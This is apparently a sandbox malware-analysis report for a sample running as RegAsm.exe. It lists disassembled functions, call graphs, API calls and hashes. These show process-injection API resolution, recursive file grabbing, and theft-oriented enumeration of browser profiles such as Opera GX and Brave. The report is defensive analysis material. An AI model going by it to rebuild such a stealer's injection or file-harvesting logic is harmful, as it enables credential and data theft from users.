404acb ??_U@YAPAXI ??_U@YAPAXI ??_U@YAPAXI lstrlenA InternetCrackUrlA 81192->81193 81194 404b27 81193->81194 81194->79967 81196 427068 81195->81196 81196->80272 81196->81196 81198 40806a LocalAlloc 81197->81198 81199 406724 81197->81199 81198->81199 81200 40807a CryptStringToBinaryA 81198->81200 81199->80135 81199->80147 81200->81199 81201 408091 LocalFree 81200->81201 81201->81199 81203 41d016 __setmbcp_nolock 5 API calls 81202->81203 81204 410d2c 81203->81204 81204->80327 81360 423c10 81205->81360 81208 411651 CharToOemA 81211 41d016 __setmbcp_nolock 5 API calls 81208->81211 81209 411630 RegQueryValueExA 81209->81208 81212 411682 81211->81212 81212->80341 81214 412294 81213->81214 81215 412278 K32GetModuleFileNameExA CloseHandle 81213->81215 81216 4104e7 lstrcpyA 81214->81216 81215->81214 81217 4122a0 81216->81217 81218 41d016 __setmbcp_nolock 5 API calls 81217->81218 81219 4122ae 81218->81219 81219->80384 81362 410c16 81220->81362 81223 410b63 RegOpenKeyExA 81224 410b5c 81223->81224 81225 410b83 RegQueryValueExA 81223->81225 81224->80406 81225->81224 81368 42f109 81226->81368 81228 411813 CoInitializeEx CoInitializeSecurity CoCreateInstance 81229 41186b 81228->81229 81230 411873 CoSetProxyBlanket 81229->81230 81233 411964 81229->81233 81236 4118a3 81230->81236 81231 4104e7 lstrcpyA 81232 41198f 81231->81232 81234 42f165 5 API calls 81232->81234 81233->81231 81235 411996 81234->81235 81235->80420 81236->81233 81237 4118d7 VariantInit 81236->81237 81238 4118f6 81237->81238 81369 411757 81238->81369 81240 411901 FileTimeToSystemTime GetProcessHeap HeapAlloc wsprintfA 81241 4104e7 lstrcpyA 81240->81241 81242 411958 VariantClear 81241->81242 81242->81232 81378 42f09d 81243->81378 81245 4119a3 CoInitializeEx CoInitializeSecurity CoCreateInstance 81246 4119f9 81245->81246 81247 411a01 CoSetProxyBlanket 81246->81247 81250 411a93 81246->81250 81251 411a31 81247->81251 81248 4104e7 lstrcpyA 81249 411abe 81248->81249 81249->80433 81250->81248 81251->81250 81252 411a59 VariantInit 81251->81252 81253 411a78 81252->81253 81379 411d42 LocalAlloc CharToOemW 81253->81379 81255 411a80 81256 4104e7 lstrcpyA 81255->81256 81257 411a87 VariantClear 81256->81257 81257->81249 81258->80461 81260 4104e7 lstrcpyA 81259->81260 81261 4115cd 81260->81261 81261->80476 81263 4104e7 lstrcpyA 81262->81263 81264 410e02 GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 81263->81264 81265 410eed 81264->81265 81273 410e3c 81264->81273 81267 410f05 81265->81267 81268 410ef9 LocalFree 81265->81268 81266 410e42 GetLocaleInfoA 81266->81273 81269 41d016 __setmbcp_nolock 5 API calls 81267->81269 81268->81267 81271 410f15 81269->81271 81270 410609 lstrlenA lstrcpyA lstrcatA 81270->81273 81271->80490 81272 41058d lstrcpyA 81272->81273 81273->81265 81273->81266 81273->81270 81273->81272 81275 410d86 81274->81275 81276 410d6a wsprintfA 81274->81276 81277 41d016 __setmbcp_nolock 5 API calls 81275->81277 81276->81275 81278 410d93 81277->81278 81278->80518 81280 410f94 RegQueryValueExA 81279->81280 81281 410fac 81279->81281 81280->81281 81281->80536 81283 41107c GetLogicalProcessorInformationEx 81282->81283 81284 411087 81283->81284 81285 411048 GetLastError 81283->81285 81382 411b5b GetProcessHeap HeapFree 81284->81382 81286 4110f3 81285->81286 81287 411057 81285->81287 81289 4110fd 81286->81289 81383 411b5b GetProcessHeap HeapFree 81286->81383 81296 41105b 81287->81296 81295 41d016 __setmbcp_nolock 5 API calls 81289->81295 81290 4110c0 81290->81289 81294 4110c9 wsprintfA 81290->81294 81294->81289 81298 411117 81295->81298 81296->81283 81297 4110ec 81296->81297 81380 411b5b GetProcessHeap HeapFree 81296->81380 81381 411b78 GetProcessHeap HeapAlloc 81296->81381 81297->81289 81298->80550 81300 41d016 __setmbcp_nolock 5 API calls 81299->81300 81301 411005 81300->81301 81301->80564 81384 411b26 81302->81384 81305 41115f wsprintfA 81307 41d016 __setmbcp_nolock 5 API calls 81305->81307 81308 411190 81307->81308 81308->80578 81310 4104e7 lstrcpyA 81309->81310 81316 4111b3 81310->81316 81311 4111df EnumDisplayDevicesA 81312 4111f3 81311->81312 81311->81316 81314 41d016 __setmbcp_nolock 5 API calls 81312->81314 81313 410549 2 API calls 81313->81316 81315 411201 81314->81315 81315->80592 81316->81311 81316->81312 81316->81313 81318 4104e7 lstrcpyA 81317->81318 81319 4114c6 CreateToolhelp32Snapshot Process32First 81318->81319 81320 41154c CloseHandle 81319->81320 81326 4114ee 81319->81326 81321 41d016 __setmbcp_nolock 5 API calls 81320->81321 81323 411561 81321->81323 81322 41153a Process32Next 81322->81320 81322->81326 81323->80606 81324 410609 lstrlenA lstrcpyA lstrcatA 81324->81326 81325 41058d lstrcpyA 81325->81326 81326->81322 81326->81324 81326->81325 81328 4104e7 lstrcpyA 81327->81328 81329 41123b RegOpenKeyExA 81328->81329 81330 41145e 81329->81330 81340 411281 81329->81340 81332 410519 lstrcpyA 81330->81332 81331 411287 RegEnumKeyExA 81333 4112c4 wsprintfA RegOpenKeyExA 81331->81333 81331->81340 81334 411489 81332->81334 81333->81330 81335 41130a RegQueryValueExA 81333->81335 81337 41d016 __setmbcp_nolock 5 API calls 81334->81337 81336 411340 lstrlenA 81335->81336 81335->81340 81336->81340 81338 4114a3 81337->81338 81338->80620 81339 410609 lstrlenA lstrcpyA lstrcatA 81339->81340 81340->81330 81340->81331 81340->81339 81341 4113b0 RegQueryValueExA 81340->81341 81342 41058d lstrcpyA 81340->81342 81341->81340 81342->81340 81344 416ea7 81343->81344 81345 41058d lstrcpyA 81344->81345 81346 416ec4 81345->81346 81347 41058d lstrcpyA 81346->81347 81348 416ee0 81347->81348 81349 41058d lstrcpyA 81348->81349 81350 416eeb 81349->81350 81351 41058d lstrcpyA 81350->81351 81352 416ef6 81351->81352 81353 416efd Sleep 81352->81353 81354 416f0d 81352->81354 81353->81352 81355 416f29 CreateThread WaitForSingleObject 81354->81355 81386 41ccc8 51 API calls 81354->81386 81357 4104e7 lstrcpyA 81355->81357 81361 41160c RegOpenKeyExA 81360->81361 81361->81208 81361->81209 81365 410ba9 GetProcessHeap HeapAlloc RegOpenKeyExA 81362->81365 81364 410b58 81364->81223 81364->81224 81366 410bec RegQueryValueExA 81365->81366 81367 410c03 81365->81367 81366->81367 81367->81364 81368->81228 81377 42f09d 81369->81377 81371 411763 CoCreateInstance 81372 41178b SysAllocString 81371->81372 81373 4117e7 81371->81373 81372->81373 81375 41179a 81372->81375 81373->81240 81374 4117e0 SysFreeString 81374->81373 81375->81374 81376 4117be _wtoi64 SysFreeString 81375->81376 81376->81374 81377->81371 81378->81245 81379->81255 81380->81296 81381->81296 81382->81290 81383->81289 81385 41114d GlobalMemoryStatusEx 81384->81385 81385->81305

                                                                                                        Executed Functions

                                                                                                        Function 00418950 Relevance: 231.5, APIs: 121, Strings: 11, Instructions: 518libraryloaderCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc$LibraryLoad
                                                                                                        • String ID: CreateProcessA$GetThreadContext$HttpQueryInfoA$InternetSetOptionA$ReadProcessMemory$ResumeThread$SetThreadContext$SymMatchString$VirtualAllocEx$WriteProcessMemory$dbghelp.dll
                                                                                                        • API String ID: 2238633743-2740034357
                                                                                                        • Opcode ID: 3e30b89850b8473fc7cede02b6692b6796462800fa081e8782096f790b2d890e
                                                                                                        • Instruction ID: 8261b1413bc3cc4e1081ef522fb3a36784379b70ccc82e73ae8bdeed84e113b8
                                                                                                        • Opcode Fuzzy Hash: 3e30b89850b8473fc7cede02b6692b6796462800fa081e8782096f790b2d890e
                                                                                                        • Instruction Fuzzy Hash: 7352F475910312AFEF1ADFA0FD188243BA7F718707F11A466E91582270E73B4A64EF19
                                                                                                        Function 00414CC8 Relevance: 44.0, APIs: 21, Strings: 4, Instructions: 297stringfileCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1346 414cc8-414d6f call 42e390 wsprintfA FindFirstFileA call 423c10 * 2 1353 414d75-414d89 StrCmpCA 1346->1353 1354 41512b-415141 call 401cde call 41d016 1346->1354 1356 4150f8-41510d FindNextFileA 1353->1356 1357 414d8f-414da3 StrCmpCA 1353->1357 1360 41511f-415125 FindClose 1356->1360 1361 41510f-415111 1356->1361 1357->1356 1359 414da9-414deb wsprintfA StrCmpCA 1357->1359 1363 414e0a-414e1c wsprintfA 1359->1363 1364 414ded-414e08 wsprintfA 1359->1364 1360->1354 1361->1353 1366 414e1f-414e5c call 423c10 lstrcatA 1363->1366 1364->1366 1369 414e82-414e89 strtok_s 1366->1369 1370 414e8b-414ec9 call 423c10 lstrcatA strtok_s 1369->1370 1371 414e5e-414e6f 1369->1371 1376 415089-41508d 1370->1376 1377 414ecf-414edf PathMatchSpecA 1370->1377 1375 414e75-414e81 1371->1375 1371->1376 1375->1369 1376->1356 1378 41508f-415095 1376->1378 1379 414ee5-414fbe call 4104e7 call 411c4a call 410609 call 4105c7 call 410609 call 4105c7 call 41058d call 402920 * 5 call 412166 call 42efc0 1377->1379 1380 414fd9-414fee strtok_s 1377->1380 1378->1360 1382 41509b-4150a9 1378->1382 1418 414fc0-414fd4 call 402920 1379->1418 1419 414ff9-415005 1379->1419 1380->1377 1381 414ff4 1380->1381 1381->1376 1382->1356 1384 4150ab-4150ed call 401cfd call 414cc8 1382->1384 1392 4150f2 1384->1392 1392->1356 1418->1380 1420 415116-41511d call 402920 1419->1420 1421 41500b-415031 call 410519 call 407fac 1419->1421 1420->1354 1431 415033-415077 call 401cfd call 4104e7 call 416e97 call 402920 1421->1431 1432 41507d-415084 call 402920 1421->1432 1431->1432 1432->1376
                                                                                                        APIs
                                                                                                        • wsprintfA.USER32 ref: 00414D1C
                                                                                                        • FindFirstFileA.KERNEL32(?,?), ref: 00414D33
                                                                                                        • _memset.LIBCMT ref: 00414D4F
                                                                                                        • _memset.LIBCMT ref: 00414D60
                                                                                                        • StrCmpCA.SHLWAPI(?,004369F8), ref: 00414D81
                                                                                                        • StrCmpCA.SHLWAPI(?,004369FC), ref: 00414D9B
                                                                                                        • wsprintfA.USER32 ref: 00414DC2
                                                                                                        • StrCmpCA.SHLWAPI(?,0043660F), ref: 00414DD6
                                                                                                        • wsprintfA.USER32 ref: 00414DFF
                                                                                                        • wsprintfA.USER32 ref: 00414E16
                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                          • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                          • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                          • Part of subcall function 00412166: CreateFileA.KERNEL32(00414FAC,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,00414FAC,?), ref: 00412181
                                                                                                        • _memset.LIBCMT ref: 00414E28
                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 00414E3D
                                                                                                        • strtok_s.MSVCRT ref: 00414E82
                                                                                                        • _memset.LIBCMT ref: 00414E94
                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 00414EA9
                                                                                                        • strtok_s.MSVCRT ref: 00414EC2
                                                                                                        • PathMatchSpecA.SHLWAPI(?,00000000), ref: 00414ED7
                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00414FB6
                                                                                                        • strtok_s.MSVCRT ref: 00414FE7
                                                                                                        • FindNextFileA.KERNELBASE(?,?), ref: 00415105
                                                                                                        • FindClose.KERNEL32(?), ref: 00415125
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _memsetlstrcatwsprintf$FileFindlstrcpystrtok_s$CloseCreateFirstMatchNextPathSpecUnothrow_t@std@@@__ehfuncinfo$??2@lstrlen
                                                                                                        • String ID: %s\%s$%s\%s$%s\%s\%s$%s\*.*
                                                                                                        • API String ID: 2867719434-332874205
                                                                                                        • Opcode ID: 0bc5adfbe4236ef78a4ad54126e2e77cc3e862c7c695f1d91d4ab824e5d186cb
                                                                                                        • Instruction ID: 9fc36efd77a6d1cd63b80ec75f09b897df8326cc2b47f4e5761c6ba69d6b93d4
                                                                                                        • Opcode Fuzzy Hash: 0bc5adfbe4236ef78a4ad54126e2e77cc3e862c7c695f1d91d4ab824e5d186cb
                                                                                                        • Instruction Fuzzy Hash: 5BC12AB2E0021AABCF21EF61DC45AEE777DAF08305F0144A6F609B3151D7399B858F55
                                                                                                        Function 0040884C Relevance: 42.4, APIs: 23, Strings: 1, Instructions: 405memoryfilestringCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1443 40884c-408865 call 410795 1446 408867-40886c 1443->1446 1447 40886e-40887e call 410795 1443->1447 1448 408885-40888d call 410549 1446->1448 1452 408880 1447->1452 1453 40888f-40889f call 410795 1447->1453 1455 4088a5-408922 call 4104e7 call 411c4a call 410609 call 4105c7 call 410609 call 4105c7 call 41058d call 402920 * 5 1448->1455 1452->1448 1453->1455 1459 408d72-408d96 call 402920 * 3 call 401cde 1453->1459 1491 408939-408949 CopyFileA 1455->1491 1492 408924-408936 call 410519 call 4122b0 1491->1492 1493 40894b-408984 call 4104e7 call 410609 call 41058d call 402920 1491->1493 1492->1491 1506 408986-4089d7 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d 1493->1506 1507 4089dc-408a5b call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 410609 call 41058d call 402920 1493->1507 1540 408a60-408a79 call 402920 1506->1540 1507->1540 1549 408d4b-408d57 DeleteFileA call 402920 1540->1549 1550 408a7f-408a9a 1540->1550 1555 408d5c-408d6b call 402920 * 2 1549->1555 1557 408aa0-408ab6 GetProcessHeap RtlAllocateHeap 1550->1557 1558 408d37-408d4a 1550->1558 1570 408d6d call 402920 1555->1570 1561 408cda-408ce7 1557->1561 1558->1549 1568 408abb-408b9d call 4104e7 * 6 call 401cfd call 410519 call 40826d StrCmpCA 1561->1568 1569 408ced-408cf9 lstrlenA 1561->1569 1606 408ba3-408bb6 StrCmpCA 1568->1606 1607 408d97-408dd9 call 402920 * 8 1568->1607 1569->1558 1571 408cfb-408d27 call 401cfd lstrlenA call 410519 call 416e97 1569->1571 1570->1459 1582 408d2c-408d32 call 402920 1571->1582 1582->1558 1609 408bc0 1606->1609 1610 408bb8-408bbe 1606->1610 1607->1570 1612 408bc6-408bde call 410549 StrCmpCA 1609->1612 1610->1612 1617 408be0-408be6 1612->1617 1618 408be8 1612->1618 1620 408bee-408bf9 call 410549 1617->1620 1618->1620 1627 408c08-408cd5 lstrcatA * 14 call 402920 * 7 1620->1627 1628 408bfb-408c03 call 410549 1620->1628 1627->1561 1628->1627
                                                                                                        APIs
                                                                                                          • Part of subcall function 00410795: StrCmpCA.SHLWAPI(?,?,?,00408863,?,?,?), ref: 0041079E
                                                                                                        • CopyFileA.KERNEL32(?,?,00000001,004371C4,004367CF,?,?,?), ref: 00408941
                                                                                                          • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                          • Part of subcall function 004122B0: _memset.LIBCMT ref: 004122D7
                                                                                                          • Part of subcall function 004122B0: OpenProcess.KERNEL32(00001001,00000000,?,00000000,?), ref: 0041237D
                                                                                                          • Part of subcall function 004122B0: TerminateProcess.KERNEL32(00000000,00000000), ref: 0041238B
                                                                                                          • Part of subcall function 004122B0: CloseHandle.KERNEL32(00000000), ref: 00412392
                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                          • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                          • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                        • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00408AA6
                                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00408AAD
                                                                                                        • StrCmpCA.SHLWAPI(?,ERROR_RUN_EXTRACTOR), ref: 00408B95
                                                                                                        • StrCmpCA.SHLWAPI(?,004371E8), ref: 00408BAB
                                                                                                        • StrCmpCA.SHLWAPI(?,004371EC), ref: 00408BD3
                                                                                                        • lstrlenA.KERNEL32(?), ref: 00408CF0
                                                                                                        • lstrlenA.KERNEL32(?), ref: 00408D0B
                                                                                                          • Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                                                          • Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                                                        • DeleteFileA.KERNEL32(?), ref: 00408D4E
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrcpy$Processlstrlen$FileHeaplstrcat$AllocateCloseCopyCreateDeleteHandleObjectOpenSingleTerminateThreadWait_memset
                                                                                                        • String ID: ERROR_RUN_EXTRACTOR
                                                                                                        • API String ID: 2819533921-2709115261
                                                                                                        • Opcode ID: 0b36c14b47e0fd9c7b7447fafa283bbeba69ea66fa84174adce9456e951a1997
                                                                                                        • Instruction ID: 65d458a2be874082b650ad6ccfc12f730853009eff9118d7dbcfdf0fd3eb137e
                                                                                                        • Opcode Fuzzy Hash: 0b36c14b47e0fd9c7b7447fafa283bbeba69ea66fa84174adce9456e951a1997
                                                                                                        • Instruction Fuzzy Hash: CAE14F71A00209AFCF01FFA1ED4A9DD7B76AF04309F10502AF541B71A1DB796E958F98
                                                                                                        Function 00409D1C Relevance: 40.9, APIs: 18, Strings: 5, Instructions: 610fileCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1650 409d1c-409dd5 call 4104e7 call 4105c7 call 410609 call 41058d call 402920 * 2 call 4104e7 * 2 FindFirstFileA 1667 40a788-40a7d7 call 402920 * 3 call 401cde call 402920 * 3 call 41d016 1650->1667 1668 409ddb-409def StrCmpCA 1650->1668 1669 40a761-40a776 FindNextFileA 1668->1669 1670 409df5-409e09 StrCmpCA 1668->1670 1669->1668 1672 40a77c-40a782 FindClose 1669->1672 1670->1669 1673 409e0f-409e85 call 410549 call 4105c7 call 410609 * 2 call 41058d call 402920 * 3 1670->1673 1672->1667 1705 409e8b-409ea1 StrCmpCA 1673->1705 1706 409f8e-40a002 call 410609 * 4 call 41058d call 402920 * 3 1673->1706 1707 409ea3-409f13 call 410609 * 4 call 41058d call 402920 * 3 1705->1707 1708 409f18-409f8c call 410609 * 4 call 41058d call 402920 * 3 1705->1708 1757 40a008-40a01d call 402920 StrCmpCA 1706->1757 1707->1757 1708->1757 1760 40a023-40a037 StrCmpCA 1757->1760 1761 40a1ef-40a204 StrCmpCA 1757->1761 1760->1761 1764 40a03d-40a173 call 4104e7 call 411c4a call 410609 call 4105c7 call 410609 call 4105c7 call 41058d call 402920 * 5 call 4104e7 call 410609 * 2 call 41058d call 402920 * 2 call 410519 call 407fac 1760->1764 1762 40a206-40a249 call 401cfd call 410519 * 3 call 40852e 1761->1762 1763 40a259-40a26e StrCmpCA 1761->1763 1822 40a24e-40a254 1762->1822 1765 40a270-40a281 StrCmpCA 1763->1765 1766 40a2cf-40a2e9 call 410519 call 411d92 1763->1766 1954 40a175-40a1b3 call 401cfd call 410519 call 416e97 call 402920 1764->1954 1955 40a1b8-40a1ea call 402920 * 3 1764->1955 1769 40a6d0-40a6d7 1765->1769 1770 40a287-40a28b 1765->1770 1793 40a2eb-40a2ef 1766->1793 1794 40a34f-40a364 StrCmpCA 1766->1794 1774 40a731-40a75b call 402920 * 2 1769->1774 1775 40a6d9-40a726 call 401cfd call 410519 * 2 call 4104e7 call 409d1c 1769->1775 1770->1769 1776 40a291-40a2cd call 401cfd call 410519 * 2 1770->1776 1774->1669 1844 40a72b 1775->1844 1827 40a335-40a33f call 410519 call 40884c 1776->1827 1793->1769 1802 40a2f5-40a32f call 401cfd call 410519 call 4104e7 1793->1802 1799 40a546-40a55b StrCmpCA 1794->1799 1800 40a36a-40a426 call 4104e7 call 411c4a call 410609 call 4105c7 call 410609 call 4105c7 call 41058d call 402920 * 5 CopyFileA 1794->1800 1799->1769 1813 40a561-40a61d call 4104e7 call 411c4a call 410609 call 4105c7 call 410609 call 4105c7 call 41058d call 402920 * 5 CopyFileA 1799->1813 1901 40a4b9-40a4c9 StrCmpCA 1800->1901 1902 40a42c-40a4b3 call 401cfd call 410519 * 3 call 408ddb call 401cfd call 410519 * 3 call 409549 1800->1902 1802->1827 1904 40a623-40a69e call 401cfd call 410519 * 3 call 409072 call 401cfd call 410519 * 3 call 4092a7 1813->1904 1905 40a6a4-40a6b6 DeleteFileA call 402920 1813->1905 1822->1769 1849 40a344-40a34a 1827->1849 1844->1774 1849->1769 1908 40a4cb-40a516 call 401cfd call 410519 * 3 call 409a0e 1901->1908 1909 40a51c-40a52e DeleteFileA call 402920 1901->1909 1902->1901 1904->1905 1920 40a6bb-40a6c2 1905->1920 1908->1909 1919 40a533-40a541 1909->1919 1926 40a6c9-40a6cb call 402920 1919->1926 1920->1926 1926->1769 1954->1955 1955->1761
                                                                                                        APIs
                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                          • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                          • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                        • FindFirstFileA.KERNEL32(?,?,004367F2,004367EF,00437324,004367EE,?,?,?), ref: 00409DC6
                                                                                                        • StrCmpCA.SHLWAPI(?,00437328), ref: 00409DE7
                                                                                                        • StrCmpCA.SHLWAPI(?,0043732C), ref: 00409E01
                                                                                                          • Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 0041054F
                                                                                                          • Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 00410581
                                                                                                        • StrCmpCA.SHLWAPI(?,Opera GX,00437330,?,004367F3), ref: 00409E93
                                                                                                        • StrCmpCA.SHLWAPI(?,Brave,00437350,00437354,00437330,?,004367F3), ref: 0040A015
                                                                                                        • StrCmpCA.SHLWAPI(?,Preferences), ref: 0040A02F
                                                                                                        • StrCmpCA.SHLWAPI(?), ref: 0040A1FC
                                                                                                        • StrCmpCA.SHLWAPI(?), ref: 0040A266
                                                                                                        • StrCmpCA.SHLWAPI(0040CCE9), ref: 0040A279
                                                                                                          • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                        • StrCmpCA.SHLWAPI(?), ref: 0040A35C
                                                                                                        • CopyFileA.KERNEL32(?,?,00000001,0043738C,004367FB), ref: 0040A41C
